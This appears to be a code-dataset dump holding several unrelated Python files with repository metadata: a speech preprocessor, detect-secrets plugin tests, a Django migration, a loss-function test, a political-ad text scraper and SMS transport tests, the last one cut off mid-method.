        mel_filename = "{}-mel-{}.npy".format(speaker, basename)
        np.save(
            os.path.join(self.out_dir, "mel", mel_filename),
            mel_spectrogram.T,
        )
        return (
            "|".join([basename, speaker, text, raw_text]),
            mel_spectrogram.shape[1],
        )
| 33.677165 | 128 | 0.574468 | import os
import random
import json
import tgt
import librosa
import numpy as np
from tqdm import tqdm
import audio as Audio
from text import grapheme_to_phoneme
from utils.tools import read_lexicon
from g2p_en import G2p
random.seed(1234)
class Preprocessor:
def __init__(self, config):
self.config = config
self.in_dir = config["path"]["raw_path"]
self.out_dir = config["path"]["preprocessed_path"]
self.val_size = config["preprocessing"]["val_size"]
self.sampling_rate = config["preprocessing"]["audio"]["sampling_rate"]
self.skip_len = config["preprocessing"]["audio"]["skip_len"]
self.trim_top_db = config["preprocessing"]["audio"]["trim_top_db"]
self.filter_length = config["preprocessing"]["stft"]["filter_length"]
self.hop_length = config["preprocessing"]["stft"]["hop_length"]
self.g2p = G2p()
self.lexicon = read_lexicon(config["path"]["lexicon_path"])
self.STFT = Audio.stft.TacotronSTFT(
config["preprocessing"]["stft"]["filter_length"],
config["preprocessing"]["stft"]["hop_length"],
config["preprocessing"]["stft"]["win_length"],
config["preprocessing"]["mel"]["n_mel_channels"],
config["preprocessing"]["audio"]["sampling_rate"],
config["preprocessing"]["mel"]["mel_fmin"],
config["preprocessing"]["mel"]["mel_fmax"],
)
def build_from_path(self):
os.makedirs((os.path.join(self.out_dir, "mel")), exist_ok=True)
print("Processing Data ...")
out = list()
n_frames = 0
speakers = {}
for i, speaker in enumerate(tqdm(os.listdir(self.in_dir))):
speakers[speaker] = i
for wav_name in tqdm(os.listdir(os.path.join(self.in_dir, speaker))):
if ".wav" not in wav_name:
continue
basename = wav_name.split(".")[0]
ret = self.process_utterance(speaker, basename)
if ret is None:
continue
else:
info, n = ret
out.append(info)
n_frames += n
with open(os.path.join(self.out_dir, "speakers.json"), "w") as f:
f.write(json.dumps(speakers))
print(
"Total time: {} hours".format(
n_frames * self.hop_length / self.sampling_rate / 3600
)
)
random.shuffle(out)
out = [r for r in out if r is not None]
with open(os.path.join(self.out_dir, "train.txt"), "w", encoding="utf-8") as f:
for m in out[self.val_size :]:
f.write(m + "\n")
with open(os.path.join(self.out_dir, "val.txt"), "w", encoding="utf-8") as f:
for m in out[: self.val_size]:
f.write(m + "\n")
return out
def process_utterance(self, speaker, basename):
wav_path = os.path.join(self.in_dir, speaker, "{}.wav".format(basename))
text_path = os.path.join(self.in_dir, speaker, "{}.lab".format(basename))
wav, _ = librosa.load(wav_path)
wav = wav.astype(np.float32)
if len(wav) < self.skip_len:
return None
wav = librosa.effects.trim(wav, top_db=self.trim_top_db, frame_length=self.filter_length, hop_length=self.hop_length)[0]
mel_spectrogram, _ = Audio.stft.get_mel_spectrogram(self.STFT, wav)
mel_spectrogram = mel_spectrogram.squeeze(1).numpy()
with open(text_path, "r") as f:
raw_text = f.readline().strip("\n")
phone = grapheme_to_phoneme(raw_text, self.g2p, self.lexicon)
text = "{" + " ".join(phone) + "}"
mel_filename = "{}-mel-{}.npy".format(speaker, basename)
np.save(
os.path.join(self.out_dir, "mel", mel_filename),
mel_spectrogram.T,
)
return (
"|".join([basename, speaker, text, raw_text]),
mel_spectrogram.shape[1],
)
| true | true |
1c332e30c32aa1ed1f57437c220782a600b636df | 3,771 | py | Python | tests/plugins/base_test.py | digjanaik/detect-secrets | 624024ad5fd8a608e09ed719e5edab6ca95ef47e | [
"Apache-2.0"
] | 1 | 2020-05-19T05:07:19.000Z | 2020-05-19T05:07:19.000Z | tests/plugins/base_test.py | digjanaik/detect-secrets | 624024ad5fd8a608e09ed719e5edab6ca95ef47e | [
"Apache-2.0"
] | 1 | 2020-08-12T21:57:16.000Z | 2020-08-12T21:57:16.000Z | tests/plugins/base_test.py | digjanaik/detect-secrets | 624024ad5fd8a608e09ed719e5edab6ca95ef47e | [
"Apache-2.0"
] | 1 | 2021-07-14T16:53:12.000Z | 2021-07-14T16:53:12.000Z | from contextlib import contextmanager
import mock
import pytest
from detect_secrets.core.constants import VerifiedResult
from detect_secrets.plugins.base import BasePlugin
from testing.factories import potential_secret_factory
from testing.mocks import mock_file_object
@pytest.mark.parametrize(
    'name, expected',
    (
        ('HexHighEntropyString', 'no-hex-high-entropy-string-scan'),
        ('KeywordDetector', 'no-keyword-scan'),
        ('PrivateKeyDetector', 'no-private-key-scan'),
    ),
)
def test_disable_flag_text(name, expected):
    """The disable flag is derived from the plugin class's name."""
    class MockPlugin(BasePlugin):
        @property
        def secret_type(self):  # pragma: no cover
            return ''
    # Rename the class so the derived flag reflects *name*.
    MockPlugin.__name__ = str(name)
    assert MockPlugin.disable_flag_text == expected
class TestVerify:
    """Tests for how BasePlugin reports and filters verified secrets."""

    @pytest.mark.parametrize(
        'result, output',
        (
            (
                VerifiedResult.UNVERIFIED,
                'True (unverified)',
            ),
            (
                VerifiedResult.VERIFIED_FALSE,
                'False (verified)',
            ),
            (
                VerifiedResult.VERIFIED_TRUE,
                'True (verified)',
            ),
        ),
    )
    def test_adhoc_scan_values(self, result, output):
        """adhoc_scan includes the verification status in its output."""
        with self.create_test_plugin(result) as plugin:
            assert plugin.adhoc_scan('test value') == output

    def test_adhoc_scan_should_abide_by_no_verify_flag(self):
        """With verification disabled, no status suffix is appended."""
        with self.create_test_plugin(VerifiedResult.VERIFIED_TRUE) as plugin:
            plugin.should_verify = False
            assert plugin.adhoc_scan('test value') == 'True'

    def test_analyze_verified_false_ignores_value(self):
        """Secrets verified as false positives are dropped from results."""
        with self.create_test_plugin(VerifiedResult.VERIFIED_FALSE) as plugin:
            file = mock_file_object('does not matter')
            result = plugin.analyze(file, 'does not matter')
            assert len(result) == 0

    def test_analyze_verified_true_adds_intel(self):
        """Secrets verified as real are flagged is_verified."""
        with self.create_test_plugin(VerifiedResult.VERIFIED_TRUE) as plugin:
            file = mock_file_object('does not matter')
            result = plugin.analyze(file, 'does not matter')
            assert list(result.keys())[0].is_verified

    def test_analyze_unverified_stays_the_same(self):
        """Unverified secrets are kept, but not marked verified."""
        with self.create_test_plugin(VerifiedResult.UNVERIFIED) as plugin:
            file = mock_file_object('does not matter')
            result = plugin.analyze(file, 'does not matter')
            assert not list(result.keys())[0].is_verified

    def test_analyze_should_abide_by_no_verify_flag(self):
        """With verification disabled, even false positives are kept."""
        with self.create_test_plugin(VerifiedResult.VERIFIED_FALSE) as plugin:
            plugin.should_verify = False
            file = mock_file_object('does not matter')
            result = plugin.analyze(file, 'does not matter')
            # If it is verified, this value should be 0.
            assert len(result) == 1

    @contextmanager
    def create_test_plugin(self, result):
        """Yield a plugin whose ``verify()`` always returns *result*.

        :type result: VerifiedResult
        """
        class MockPlugin(BasePlugin):  # pragma: no cover
            secret_type = 'test_verify'

            def analyze_string_content(self, *args, **kwargs):
                # Always "find" exactly one secret.
                secret = potential_secret_factory()
                return {
                    secret: secret,
                }

            def secret_generator(self, *args, **kwargs):
                pass

            def verify(self, *args, **kwargs):
                return result

        # Stub out the snippet highlighter so adhoc_scan output is stable.
        with mock.patch(
            'detect_secrets.plugins.base.CodeSnippetHighlighter',
            autospec=True,
        ) as mock_snippet:
            plugin = MockPlugin()
            plugin.should_verify = True
            mock_snippet().get_code_snippet.return_value = ''
            yield plugin
| 31.425 | 78 | 0.619464 | from contextlib import contextmanager
import mock
import pytest
from detect_secrets.core.constants import VerifiedResult
from detect_secrets.plugins.base import BasePlugin
from testing.factories import potential_secret_factory
from testing.mocks import mock_file_object
@pytest.mark.parametrize(
'name, expected',
(
('HexHighEntropyString', 'no-hex-high-entropy-string-scan'),
('KeywordDetector', 'no-keyword-scan'),
('PrivateKeyDetector', 'no-private-key-scan'),
),
)
def test_disable_flag_text(name, expected):
class MockPlugin(BasePlugin):
@property
def secret_type(self):
return ''
MockPlugin.__name__ = str(name)
assert MockPlugin.disable_flag_text == expected
class TestVerify:
@pytest.mark.parametrize(
'result, output',
(
(
VerifiedResult.UNVERIFIED,
'True (unverified)',
),
(
VerifiedResult.VERIFIED_FALSE,
'False (verified)',
),
(
VerifiedResult.VERIFIED_TRUE,
'True (verified)',
),
),
)
def test_adhoc_scan_values(self, result, output):
with self.create_test_plugin(result) as plugin:
assert plugin.adhoc_scan('test value') == output
def test_adhoc_scan_should_abide_by_no_verify_flag(self):
with self.create_test_plugin(VerifiedResult.VERIFIED_TRUE) as plugin:
plugin.should_verify = False
assert plugin.adhoc_scan('test value') == 'True'
def test_analyze_verified_false_ignores_value(self):
with self.create_test_plugin(VerifiedResult.VERIFIED_FALSE) as plugin:
file = mock_file_object('does not matter')
result = plugin.analyze(file, 'does not matter')
assert len(result) == 0
def test_analyze_verified_true_adds_intel(self):
with self.create_test_plugin(VerifiedResult.VERIFIED_TRUE) as plugin:
file = mock_file_object('does not matter')
result = plugin.analyze(file, 'does not matter')
assert list(result.keys())[0].is_verified
def test_analyze_unverified_stays_the_same(self):
with self.create_test_plugin(VerifiedResult.UNVERIFIED) as plugin:
file = mock_file_object('does not matter')
result = plugin.analyze(file, 'does not matter')
assert not list(result.keys())[0].is_verified
def test_analyze_should_abide_by_no_verify_flag(self):
with self.create_test_plugin(VerifiedResult.VERIFIED_FALSE) as plugin:
plugin.should_verify = False
file = mock_file_object('does not matter')
result = plugin.analyze(file, 'does not matter')
assert len(result) == 1
@contextmanager
def create_test_plugin(self, result):
class MockPlugin(BasePlugin):
secret_type = 'test_verify'
def analyze_string_content(self, *args, **kwargs):
secret = potential_secret_factory()
return {
secret: secret,
}
def secret_generator(self, *args, **kwargs):
pass
def verify(self, *args, **kwargs):
return result
with mock.patch(
'detect_secrets.plugins.base.CodeSnippetHighlighter',
autospec=True,
) as mock_snippet:
plugin = MockPlugin()
plugin.should_verify = True
mock_snippet().get_code_snippet.return_value = ''
yield plugin
| true | true |
1c332eadaeec91974c0a1e42791d552c367427f6 | 1,259 | py | Python | profiles/migrations/0002_auto_20210313_1656.py | ezekieltech/eduTech-backend | 33b82f57add98285b73d89bc9d97f499cdb3f1e4 | [
"MIT"
] | null | null | null | profiles/migrations/0002_auto_20210313_1656.py | ezekieltech/eduTech-backend | 33b82f57add98285b73d89bc9d97f499cdb3f1e4 | [
"MIT"
] | 15 | 2021-01-02T17:43:37.000Z | 2021-02-13T12:02:11.000Z | profiles/migrations/0002_auto_20210313_1656.py | ezekieltech/eduTech-backend | 33b82f57add98285b73d89bc9d97f499cdb3f1e4 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-03-13 15:56
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Link each profile model to its owning user account.

    Adds a one-to-one ``user`` field to the mentor, mentee and
    edu-consultant profile models, each restricted (via limit_choices_to)
    to user accounts with the matching ``role``.
    """

    # NOTE(review): ``initial = True`` on a migration that also depends on
    # '0001_initial' of the same app is unusual -- confirm this was intended.
    initial = True

    dependencies = [
        ('profiles', '0001_initial'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.AddField(
            model_name='mentorprofile',
            name='user',
            field=models.OneToOneField(limit_choices_to={'role': 'Mentor'}, on_delete=django.db.models.deletion.CASCADE, related_name='profile_mentor', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='menteeprofile',
            name='user',
            field=models.OneToOneField(limit_choices_to={'role': 'Mentee'}, on_delete=django.db.models.deletion.CASCADE, related_name='profile_mentee', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='educonsultantprofile',
            name='user',
            field=models.OneToOneField(limit_choices_to={'role': 'Edu-Consultant'}, on_delete=django.db.models.deletion.CASCADE, related_name='profile_educonsultant', to=settings.AUTH_USER_MODEL),
        ),
    ]
| 37.029412 | 196 | 0.67355 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('profiles', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.AddField(
model_name='mentorprofile',
name='user',
field=models.OneToOneField(limit_choices_to={'role': 'Mentor'}, on_delete=django.db.models.deletion.CASCADE, related_name='profile_mentor', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='menteeprofile',
name='user',
field=models.OneToOneField(limit_choices_to={'role': 'Mentee'}, on_delete=django.db.models.deletion.CASCADE, related_name='profile_mentee', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='educonsultantprofile',
name='user',
field=models.OneToOneField(limit_choices_to={'role': 'Edu-Consultant'}, on_delete=django.db.models.deletion.CASCADE, related_name='profile_educonsultant', to=settings.AUTH_USER_MODEL),
),
]
| true | true |
1c332eba54cf48ce209e84efa7ccdceb379fb0bc | 492 | py | Python | tests/nn/mse_loss_test.py | kbrodt/tor4 | d09740b746c534e67a72f492c7c03654f5888a46 | [
"MIT"
] | null | null | null | tests/nn/mse_loss_test.py | kbrodt/tor4 | d09740b746c534e67a72f492c7c03654f5888a46 | [
"MIT"
] | null | null | null | tests/nn/mse_loss_test.py | kbrodt/tor4 | d09740b746c534e67a72f492c7c03654f5888a46 | [
"MIT"
] | null | null | null | import tor4
import tor4.nn as nn
def test_mse_backward():
    """mse_loss agrees with a manual computation and the slow reference
    implementation, and backpropagates d/dx mean((x - t)^2) = 2(x - t)/n.
    """
    inputs = tor4.tensor(data=[1.0, 2, 3], requires_grad=True)
    targets = tor4.tensor(data=[2, 3, 2])
    mse_nn = nn.functional.mse_loss(inputs, targets)
    # Manual reference: mean of squared differences.
    mse = ((inputs - targets) ** 2).mean()
    mse2 = nn.functional.mse_loss_slow(inputs, targets)
    mse_nn.backward()
    # Differences are (-1, -1, 1) -> loss = (1 + 1 + 1) / 3 = 1.
    assert mse_nn.item() == mse.item() == mse2.item() == 1
    assert mse_nn.requires_grad
    # Gradient: 2 * diff / 3 elementwise.
    assert inputs.grad.tolist() == [-2 / 3, -2 / 3, 2 / 3]
| 27.333333 | 62 | 0.634146 | import tor4
import tor4.nn as nn
def test_mse_backward():
inputs = tor4.tensor(data=[1.0, 2, 3], requires_grad=True)
targets = tor4.tensor(data=[2, 3, 2])
mse_nn = nn.functional.mse_loss(inputs, targets)
mse = ((inputs - targets) ** 2).mean()
mse2 = nn.functional.mse_loss_slow(inputs, targets)
mse_nn.backward()
assert mse_nn.item() == mse.item() == mse2.item() == 1
assert mse_nn.requires_grad
assert inputs.grad.tolist() == [-2 / 3, -2 / 3, 2 / 3]
| true | true |
1c332f66e37a34e84130c88451c698f9e98f4daa | 1,640 | py | Python | textParser.py | guardian/google-ad-database-processing-scripts | e5e6becabb2f9696f2979936234cdb878626f557 | [
"MIT"
] | 1 | 2021-12-04T00:03:35.000Z | 2021-12-04T00:03:35.000Z | textParser.py | guardian/google-ad-database-processing-scripts | e5e6becabb2f9696f2979936234cdb878626f557 | [
"MIT"
] | null | null | null | textParser.py | guardian/google-ad-database-processing-scripts | e5e6becabb2f9696f2979936234cdb878626f557 | [
"MIT"
] | null | null | null | import requests
import simplejson as json
import scraperwiki
import time
# Text ad example https://transparencyreport.google.com/transparencyreport/api/v3/politicalads/creatives/details?entity_id=AR117485875444580352&creative_id=CR113556358325862400&hl=en
def getFullAdText(ad_text_json):
    """Flatten the ad-text JSON fragment into one newline-separated string.

    String elements become their own line; list elements are joined with a
    trailing space per item and then terminated with a newline.  Any other
    element type is ignored.
    """
    parts = []
    for element in ad_text_json:
        if isinstance(element, str):
            parts.append(element + "\n")
        elif isinstance(element, list):
            joined = "".join(item + " " for item in element)
            parts.append(joined + "\n")
    return "".join(parts)
def getAdText(ad_url):
    """Fetch the full text of a Google political text ad.

    *ad_url* is a transparency-report creative URL whose path segments 6
    and 8 carry the entity (AR...) and creative (CR...) ids.  Returns the
    flattened ad text, or None when the creative has been removed.
    """
    url_split = ad_url.split("/")
    ar_id = url_split[6]
    cr_id = url_split[8]
    ad_api_url = f"https://transparencyreport.google.com/transparencyreport/api/v3/politicalads/creatives/details?entity_id={ar_id}&creative_id={cr_id}&hl=en"
    print(ad_api_url)
    ad_results = requests.get(ad_api_url)
    # The API prefixes its JSON with an anti-XSSI guard that must be stripped.
    results_text = ad_results.text.replace(")]}'", "").strip()
    ad_results_json = json.loads(results_text)
    if len(ad_results_json[0][3]) == 0:
        # BUG FIX: this branch previously fell through to `return full_text`
        # with `full_text` never assigned, raising UnboundLocalError.
        print("Removed?")
        return None
    ad_text_json = ad_results_json[0][3][3][8]
    print(ad_text_json)
    full_text = getFullAdText(ad_text_json)
    print(full_text)
    return full_text
def parseTextAds():
    """Fetch and store ad text for every 'Text' ad still missing it.

    Selects rows from the ``aus_ads`` table whose ``ad_text`` is NULL,
    scrapes the text via getAdText() and writes each row back keyed on
    ``Ad_ID``.
    """
    # queryString = "* from aus_ads where Ad_Type='Video' AND video_id IS NULL"
    queryString = "* from aus_ads where Ad_Type='Text' AND ad_text IS NULL"
    queryResult = scraperwiki.sqlite.select(queryString)
    for row in queryResult:
        # print(row)
        row['ad_text'] = getAdText(row['Ad_URL'])
        # print(row)
        scraperwiki.sqlite.save(unique_keys=["Ad_ID"], data=row, table_name="aus_ads")
        # Brief pause between requests to stay polite to the API.
        time.sleep(0.1)
parseTextAds() | 32.8 | 182 | 0.739634 | import requests
import simplejson as json
import scraperwiki
import time
def getFullAdText(ad_text_json):
full_text = ""
for thing in ad_text_json:
if type(thing) is str:
full_text = full_text + thing + "\n"
elif type(thing) is list:
for things in thing:
full_text = full_text + things + " "
full_text = full_text + "\n"
return full_text
def getAdText(ad_url):
url_split = ad_url.split("/")
ar_id = url_split[6]
cr_id = url_split[8]
ad_api_url = f"https://transparencyreport.google.com/transparencyreport/api/v3/politicalads/creatives/details?entity_id={ar_id}&creative_id={cr_id}&hl=en"
print(ad_api_url)
ad_results = requests.get(ad_api_url)
results_text = ad_results.text.replace(")]}'","").strip()
ad_results_json = json.loads(results_text)
if len(ad_results_json[0][3]) == 0:
print("Removed?")
else:
ad_text_json = ad_results_json[0][3][3][8]
print(ad_text_json)
full_text = getFullAdText(ad_text_json)
print(full_text)
return full_text
def parseTextAds():
# queryString = "* from aus_ads where Ad_Type='Video' AND video_id IS NULL"
queryString = "* from aus_ads where Ad_Type='Text' AND ad_text IS NULL"
queryResult = scraperwiki.sqlite.select(queryString)
for row in queryResult:
# print(row)
row['ad_text'] = getAdText(row['Ad_URL'])
# print(row)
scraperwiki.sqlite.save(unique_keys=["Ad_ID"], data=row, table_name="aus_ads")
time.sleep(0.1)
parseTextAds() | true | true |
1c333086cd645f5e0478b97ef3ea91b87966bce8 | 12,641 | py | Python | vumi/transports/cellulant/tests/test_cellulant_sms.py | vishwaprakashmishra/xmatrix | aefdab7e2980748746c7fefcd75c965cea55466f | [
"BSD-3-Clause"
] | 1 | 2016-07-27T17:13:32.000Z | 2016-07-27T17:13:32.000Z | vumi/transports/cellulant/tests/test_cellulant_sms.py | TouK/vumi | 6d250c7039fa1d82b01c5b68722aa8a6a94580b2 | [
"BSD-3-Clause"
] | null | null | null | vumi/transports/cellulant/tests/test_cellulant_sms.py | TouK/vumi | 6d250c7039fa1d82b01c5b68722aa8a6a94580b2 | [
"BSD-3-Clause"
] | null | null | null | # -*- encoding: utf-8 -*-
import json
from urllib import urlencode
from twisted.internet.defer import inlineCallbacks, DeferredQueue, returnValue
from vumi.utils import http_request, http_request_full
from vumi.tests.utils import MockHttpServer
from vumi.tests.helpers import VumiTestCase
from vumi.transports.cellulant import CellulantSmsTransport
from vumi.transports.tests.helpers import TransportHelper
class TestCellulantSmsTransport(VumiTestCase):
    @inlineCallbacks
    def setUp(self):
        """Start a mock HTTP server standing in for the Cellulant API and
        bring up a CellulantSmsTransport configured to talk to it.
        """
        # Queue capturing every outbound HTTP request the transport makes.
        self.cellulant_sms_calls = DeferredQueue()
        self.mock_cellulant_sms = MockHttpServer(self.handle_request)
        yield self.mock_cellulant_sms.start()
        self.add_cleanup(self.mock_cellulant_sms.stop)
        self.config = {
            'web_path': "foo",
            'web_port': 0,
            # Per-address API credentials; the transport picks the entry
            # matching a message's from_addr (see the outbound tests).
            'credentials': {
                '2371234567': {
                    'username': 'user',
                    'password': 'pass',
                },
                '9292': {
                    'username': 'other-user',
                    'password': 'other-pass',
                }
            },
            'outbound_url': self.mock_cellulant_sms.url,
        }
        self.tx_helper = self.add_helper(
            TransportHelper(CellulantSmsTransport))
        self.transport = yield self.tx_helper.get_transport(self.config)
        self.transport_url = self.transport.get_transport_url()
    def handle_request(self, request):
        """Record a request hitting the mock Cellulant server and reply
        with an empty body.
        """
        self.cellulant_sms_calls.put(request)
        return ''
    def mkurl(self, content, from_addr="2371234567", **kw):
        """Build an inbound-SMS URL with default Cellulant query params.

        Keyword arguments override the defaults (SOURCEADDR, DESTADDR,
        MESSAGE, ID).
        """
        params = {
            'SOURCEADDR': from_addr,
            'DESTADDR': '12345',
            'MESSAGE': content,
            'ID': '1234567',
        }
        params.update(kw)
        return self.mkurl_raw(**params)
def mkurl_raw(self, **params):
return '%s%s?%s' % (
self.transport_url,
self.config['web_path'],
urlencode(params)
)
@inlineCallbacks
def test_health(self):
result = yield http_request(
self.transport_url + "health", "", method='GET')
self.assertEqual(json.loads(result), {'pending_requests': 0})
@inlineCallbacks
def test_inbound(self):
url = self.mkurl('hello')
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['to_addr'], "12345")
self.assertEqual(msg['from_addr'], "2371234567")
self.assertEqual(msg['content'], "hello")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
@inlineCallbacks
def test_outbound(self):
yield self.tx_helper.make_dispatch_outbound(
"hello world", to_addr="2371234567")
req = yield self.cellulant_sms_calls.get()
self.assertEqual(req.path, '/')
self.assertEqual(req.method, 'GET')
self.assertEqual({
'username': ['other-user'],
'password': ['other-pass'],
'source': ['9292'],
'destination': ['2371234567'],
'message': ['hello world'],
}, req.args)
@inlineCallbacks
def test_outbound_creds_selection(self):
yield self.tx_helper.make_dispatch_outbound(
"hello world", to_addr="2371234567", from_addr='2371234567')
req = yield self.cellulant_sms_calls.get()
self.assertEqual(req.path, '/')
self.assertEqual(req.method, 'GET')
self.assertEqual({
'username': ['user'],
'password': ['pass'],
'source': ['2371234567'],
'destination': ['2371234567'],
'message': ['hello world'],
}, req.args)
yield self.tx_helper.make_dispatch_outbound(
"hello world", to_addr="2371234567", from_addr='9292')
req = yield self.cellulant_sms_calls.get()
self.assertEqual(req.path, '/')
self.assertEqual(req.method, 'GET')
self.assertEqual({
'username': ['other-user'],
'password': ['other-pass'],
'source': ['9292'],
'destination': ['2371234567'],
'message': ['hello world'],
}, req.args)
@inlineCallbacks
def test_handle_non_ascii_input(self):
url = self.mkurl(u"öæł".encode("utf-8"))
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['to_addr'], "12345")
self.assertEqual(msg['from_addr'], "2371234567")
self.assertEqual(msg['content'], u"öæł")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
@inlineCallbacks
def test_bad_parameter(self):
url = self.mkurl('hello', foo='bar')
response = yield http_request_full(url, '', method='GET')
self.assertEqual(400, response.code)
self.assertEqual(json.loads(response.delivered_body),
{'unexpected_parameter': ['foo']})
@inlineCallbacks
def test_missing_parameters(self):
url = self.mkurl_raw(ID='12345678', DESTADDR='12345', MESSAGE='hello')
response = yield http_request_full(url, '', method='GET')
self.assertEqual(400, response.code)
self.assertEqual(json.loads(response.delivered_body),
{'missing_parameter': ['SOURCEADDR']})
@inlineCallbacks
def test_ignored_parameters(self):
url = self.mkurl('hello', channelID='a', keyword='b', CHANNELID='c',
serviceID='d', SERVICEID='e', unsub='f')
response = yield http_request(url, '', method='GET')
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['content'], "hello")
self.assertEqual(json.loads(response),
{'message_id': msg['message_id']})
class TestAcksCellulantSmsTransport(VumiTestCase):
    """Tests mapping Cellulant response codes onto vumi ack/nack events."""
    @inlineCallbacks
    def setUp(self):
        """Start a mock Cellulant endpoint with a configurable response."""
        self.cellulant_sms_calls = DeferredQueue()
        self.mock_cellulant_sms = MockHttpServer(self.handle_request)
        # Body the mock endpoint returns; set per-test via mock_response().
        self._mock_response = ''
        yield self.mock_cellulant_sms.start()
        self.add_cleanup(self.mock_cellulant_sms.stop)
        self.config = {
            'web_path': "foo",
            'web_port': 0,
            'credentials': {
                '2371234567': {
                    'username': 'user',
                    'password': 'pass',
                },
                '9292': {
                    'username': 'other-user',
                    'password': 'other-pass',
                }
            },
            'outbound_url': self.mock_cellulant_sms.url,
            'validation_mode': 'permissive',
        }
        self.tx_helper = self.add_helper(
            TransportHelper(CellulantSmsTransport))
        self.transport = yield self.tx_helper.get_transport(self.config)
        self.transport_url = self.transport.get_transport_url()
    def mock_response(self, response):
        """Set the body the mock Cellulant endpoint will return."""
        self._mock_response = response
    def handle_request(self, request):
        """Record the outbound request and reply with the canned response."""
        self.cellulant_sms_calls.put(request)
        return self._mock_response
    @inlineCallbacks
    def mock_event(self, msg, nr_events):
        """Send one outbound message and return the events it triggers.

        ``msg`` is used both as the mocked response body and as part of
        the outbound message id ('id_<msg>').
        """
        self.mock_response(msg)
        yield self.tx_helper.make_dispatch_outbound(
            "foo", to_addr='2371234567', message_id='id_%s' % (msg,))
        yield self.cellulant_sms_calls.get()
        events = yield self.tx_helper.wait_for_dispatched_events(nr_events)
        returnValue(events)
    @inlineCallbacks
    def test_nack_param_error_E0(self):
        """Response 'E0' nacks with the known parameter-error reason."""
        [nack] = yield self.mock_event('E0', 1)
        self.assertEqual(nack['event_type'], 'nack')
        self.assertEqual(nack['user_message_id'], 'id_E0')
        self.assertEqual(nack['nack_reason'],
                         self.transport.KNOWN_ERROR_RESPONSE_CODES['E0'])
    @inlineCallbacks
    def test_nack_login_error_E1(self):
        """Response 'E1' nacks with the known login-error reason."""
        [nack] = yield self.mock_event('E1', 1)
        self.assertEqual(nack['event_type'], 'nack')
        self.assertEqual(nack['user_message_id'], 'id_E1')
        self.assertEqual(nack['nack_reason'],
                         self.transport.KNOWN_ERROR_RESPONSE_CODES['E1'])
    @inlineCallbacks
    def test_nack_credits_error_E2(self):
        """Response 'E2' nacks with the known credits-error reason."""
        [nack] = yield self.mock_event('E2', 1)
        self.assertEqual(nack['event_type'], 'nack')
        self.assertEqual(nack['user_message_id'], 'id_E2')
        self.assertEqual(nack['nack_reason'],
                         self.transport.KNOWN_ERROR_RESPONSE_CODES['E2'])
    @inlineCallbacks
    def test_nack_delivery_failed_1005(self):
        """Response '1005' nacks with the known delivery-failure reason."""
        [nack] = yield self.mock_event('1005', 1)
        self.assertEqual(nack['event_type'], 'nack')
        self.assertEqual(nack['user_message_id'], 'id_1005')
        self.assertEqual(nack['nack_reason'],
                         self.transport.KNOWN_ERROR_RESPONSE_CODES['1005'])
    @inlineCallbacks
    def test_unknown_response(self):
        """Unrecognised response codes nack with a generic reason string."""
        [nack] = yield self.mock_event('something_unexpected', 1)
        self.assertEqual(nack['event_type'], 'nack')
        self.assertEqual(nack['user_message_id'], 'id_something_unexpected')
        self.assertEqual(nack['nack_reason'],
                         'Unknown response code: something_unexpected')
    @inlineCallbacks
    def test_ack_success(self):
        """Response '1' acks the message."""
        [event] = yield self.mock_event('1', 1)
        self.assertEqual(event['event_type'], 'ack')
        self.assertEqual(event['user_message_id'], 'id_1')
class TestPermissiveCellulantSmsTransport(VumiTestCase):
    """Tests for inbound validation with ``validation_mode: permissive``."""
    @inlineCallbacks
    def setUp(self):
        """Start a mock Cellulant endpoint and a permissive transport."""
        self.cellulant_sms_calls = DeferredQueue()
        self.mock_cellulant_sms = MockHttpServer(self.handle_request)
        yield self.mock_cellulant_sms.start()
        self.add_cleanup(self.mock_cellulant_sms.stop)
        self.config = {
            'web_path': "foo",
            'web_port': 0,
            'credentials': {
                '2371234567': {
                    'username': 'user',
                    'password': 'pass',
                },
                '9292': {
                    'username': 'other-user',
                    'password': 'other-pass',
                }
            },
            'outbound_url': self.mock_cellulant_sms.url,
            'validation_mode': 'permissive',
        }
        self.tx_helper = self.add_helper(
            TransportHelper(CellulantSmsTransport))
        self.transport = yield self.tx_helper.get_transport(self.config)
        self.transport_url = self.transport.get_transport_url()
    def handle_request(self, request):
        """Record each outbound request; reply with an empty body."""
        self.cellulant_sms_calls.put(request)
        return ''
    def mkurl(self, content, from_addr="2371234567", **kw):
        """Build an inbound-message URL with default Cellulant parameters."""
        params = {
            'SOURCEADDR': from_addr,
            'DESTADDR': '12345',
            'MESSAGE': content,
            'ID': '1234567',
        }
        params.update(kw)
        return self.mkurl_raw(**params)
    def mkurl_raw(self, **params):
        """Join the transport URL, web path and given query parameters."""
        return '%s%s?%s' % (
            self.transport_url,
            self.config['web_path'],
            urlencode(params)
        )
    @inlineCallbacks
    def test_bad_parameter_in_permissive_mode(self):
        """Unknown parameters are accepted (HTTP 200) in permissive mode."""
        url = self.mkurl('hello', foo='bar')
        response = yield http_request_full(url, '', method='GET')
        [msg] = self.tx_helper.get_dispatched_inbound()
        self.assertEqual(200, response.code)
        self.assertEqual(json.loads(response.delivered_body),
                         {'message_id': msg['message_id']})
    @inlineCallbacks
    def test_missing_parameters(self):
        """Missing required parameters still fail with HTTP 400."""
        url = self.mkurl_raw(ID='12345678', DESTADDR='12345', MESSAGE='hello')
        response = yield http_request_full(url, '', method='GET')
        self.assertEqual(400, response.code)
        self.assertEqual(json.loads(response.delivered_body),
                         {'missing_parameter': ['SOURCEADDR']})
    @inlineCallbacks
    def test_ignored_parameters(self):
